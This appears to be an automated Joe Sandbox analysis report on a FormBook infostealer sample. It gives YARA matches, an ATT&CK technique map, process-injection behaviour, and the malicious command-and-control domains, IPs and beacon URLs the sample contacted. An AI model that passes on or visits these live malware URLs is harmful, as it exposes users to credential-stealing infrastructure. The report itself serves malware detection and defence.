          Source: explorer.exe, 00000003.00000000.687455118.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.916888031.0000000003410000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.687455118.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.916888031.0000000003410000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.687455118.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.916888031.0000000003410000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.676552486.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeQueries volume information: C:\Users\user\Desktop\lTAPQJikGw.exe VolumeInformation
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 432746 Sample: lTAPQJikGw Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 29 www.myfavbutik.com 2->29 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 7 other signatures 2->51 10 lTAPQJikGw.exe 3 2->10         started        signatures3 process4 file5 27 C:\Users\user\AppData\...\lTAPQJikGw.exe.log, ASCII 10->27 dropped 53 Tries to detect virtualization through RDTSC time measurements 10->53 55 Injects a PE file into a foreign processes 10->55 14 lTAPQJikGw.exe 10->14         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 14->57 59 Maps a DLL or memory area into another process 14->59 61 Sample uses process hollowing technique 14->61 63 Queues an APC in another process (thread injection) 14->63 17 control.exe 14->17         started        20 explorer.exe 14->20 injected process9 dnsIp10 37 Modifies the context of a thread in another process (thread injection) 17->37 39 Maps a DLL or memory area into another process 17->39 41 Tries to detect virtualization through RDTSC time measurements 17->41 23 cmd.exe 1 17->23         started        31 www.hfjxhs.com 156.241.53.161, 49769, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 20->31 33 www.cmannouncements.com 74.220.199.8, 49765, 80 UNIFIEDLAYER-AS-1US United States 20->33 35 16 other IPs or domains 20->35 43 System process connects to network (likely due to code injection or exploit) 20->43 signatures11 process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          lTAPQJikGw.exe44%VirustotalBrowse
          lTAPQJikGw.exe43%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          lTAPQJikGw.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.lTAPQJikGw.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.lTAPQJikGw.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.cmannouncements.com/p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.hfjxhs.com/p2io/?CFQHg=DTtQlm+bkwamRHt6VrobrkMYYvpq+NlfspH3ROyN3o99G08d4+CoiJMc5PUrO1w4I+TP&Pr980v=G2MtWNVHS0%Avira URL Cloudsafe
          http://www.balloon-artists.com/p2io/?CFQHg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&Pr980v=G2MtWNVHS100%Avira URL Cloudmalware
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.boogerstv.com/p2io/?CFQHg=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&Pr980v=G2MtWNVHS100%Avira URL Cloudmalware
          https://www.cleanxcare.com/p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.leonardocarrillo.com/p2io/?CFQHg=Z8FkwwkqwMcbR63JqM/eMJCTIQtJD+6S4GLVkEvBdcKRRdmUAPmyd56itTHHstyDZ3vx&Pr980v=G2MtWNVHS0%Avira URL Cloudsafe
          http://www.swayam-moj.com/p2io/?CFQHg=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIp2mnBj9Pa&Pr980v=G2MtWNVHS0%Avira URL Cloudsafe
          http://www.cleanxcare.com/p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&Pr980v=G2MtWNVHS0%Avira URL Cloudsafe
          http://www.dreamcashbuyers.com/p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHS100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.defenestration.world/p2io/?CFQHg=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsaG2+azAf30S&Pr980v=G2MtWNVHS0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.adultpeace.com/p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHS0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.myfavbutik.com
          		104.21.15.16
          		truetrue
            		unknown
            adultpeace.com
            		163.44.239.73
            		truetrue
              		unknown
              www.hfjxhs.com
              		156.241.53.161
              		truetrue
                		unknown
                www.cmannouncements.com
                		74.220.199.8
                		truetrue
                  		unknown
                  parkingpage.namecheap.com
                  		198.54.117.216
                  		truefalse
                    		high
                    www.leonardocarrillo.com
                    		172.107.55.6
                    		truetrue
                      		unknown
                      cleanxcare.com
                      		78.31.67.91
                      		truetrue
                        		unknown
                        www.balloon-artists.com
                        		147.255.162.204
                        		truetrue
                          		unknown
                          sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com
                          		54.69.66.227
                          		truefalse
                            		high
                            www.defenestration.world
                            		99.83.154.118
                            		truetrue
                              		unknown
                              ext-sq.squarespace.com
                              		198.185.159.144
                              		truefalse
                                		high
                                swayam-moj.com
                                		199.195.117.147
                                		truetrue
                                  		unknown
                                  www.swayam-moj.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.boogerstv.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.cleanxcare.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.adultpeace.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.totally-seo.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.dreamcashbuyers.com
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.cmannouncements.com/p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHStrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.hfjxhs.com/p2io/?CFQHg=DTtQlm+bkwamRHt6VrobrkMYYvpq+NlfspH3ROyN3o99G08d4+CoiJMc5PUrO1w4I+TP&Pr980v=G2MtWNVHStrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.balloon-artists.com/p2io/?CFQHg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&Pr980v=G2MtWNVHStrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.boogerstv.com/p2io/?CFQHg=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&Pr980v=G2MtWNVHStrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              www.adultpeace.com/p2io/true
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		low
                                              http://www.leonardocarrillo.com/p2io/?CFQHg=Z8FkwwkqwMcbR63JqM/eMJCTIQtJD+6S4GLVkEvBdcKRRdmUAPmyd56itTHHstyDZ3vx&Pr980v=G2MtWNVHStrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.swayam-moj.com/p2io/?CFQHg=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIp2mnBj9Pa&Pr980v=G2MtWNVHStrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.cleanxcare.com/p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&Pr980v=G2MtWNVHStrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dreamcashbuyers.com/p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHStrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.defenestration.world/p2io/?CFQHg=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsaG2+azAf30S&Pr980v=G2MtWNVHStrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.adultpeace.com/p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHStrue
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.comexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.tiro.comexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.goodfont.co.krexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.csslTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://www.cleanxcare.com/p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxbcontrol.exe, 00000007.00000002.917583197.0000000005212000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.carterandcone.comlexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.typography.netDexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://fontfabrik.comexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.%s.comPAexplorer.exe, 00000003.00000000.688234599.0000000002B50000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		low
                                                                  http://www.fonts.comexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.sandoll.co.krexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namelTAPQJikGw.exe, 00000000.00000002.657793972.0000000003341000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.sakkal.comexplorer.exe, 00000003.00000000.678260797.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      147.255.162.204
                                                                      		www.balloon-artists.comUnited States
                                                                      		7203LEASEWEB-USA-SFO-12UStrue
                                                                      198.185.159.144
                                                                      		ext-sq.squarespace.comUnited States
                                                                      		53831SQUARESPACEUSfalse
                                                                      54.69.66.227
                                                                      		sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.comUnited States
                                                                      		16509AMAZON-02USfalse
                                                                      156.241.53.161
                                                                      		www.hfjxhs.comSeychelles
                                                                      		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                      172.107.55.6
                                                                      		www.leonardocarrillo.comUnited States
                                                                      		40676AS40676UStrue
                                                                      199.195.117.147
                                                                      		swayam-moj.comUnited States
                                                                      		55293A2HOSTINGUStrue
                                                                      99.83.154.118
                                                                      		www.defenestration.worldUnited States
                                                                      		16509AMAZON-02UStrue
                                                                      163.44.239.73
                                                                      		adultpeace.comJapan7506INTERQGMOInternetIncJPtrue
                                                                      74.220.199.8
                                                                      		www.cmannouncements.comUnited States
                                                                      		46606UNIFIEDLAYER-AS-1UStrue
                                                                      198.54.117.216
                                                                      		parkingpage.namecheap.comUnited States
                                                                      		22612NAMECHEAP-NETUSfalse
                                                                      78.31.67.91
                                                                      		cleanxcare.comGermany
                                                                      		24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEtrue

                                                                      General Information

                                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                                      Analysis ID:432746
                                                                      Start date:10.06.2021
                                                                      Start time:18:05:58
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 11m 10s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Sample file name:lTAPQJikGw (renamed file extension from none to exe)
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:15
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@8/1@12/11
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 21.1% (good quality ratio 18.7%)
                                                                      • Quality average: 71.6%
                                                                      • Quality standard deviation: 32.7%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                      • TCP Packets have been reduced to 100
                                                                      • Excluded IPs from analysis (whitelisted): 13.88.21.125, 52.255.188.83, 168.61.161.212, 20.50.102.62, 20.75.105.140, 20.72.88.19, 20.54.26.129, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194, 20.82.210.154
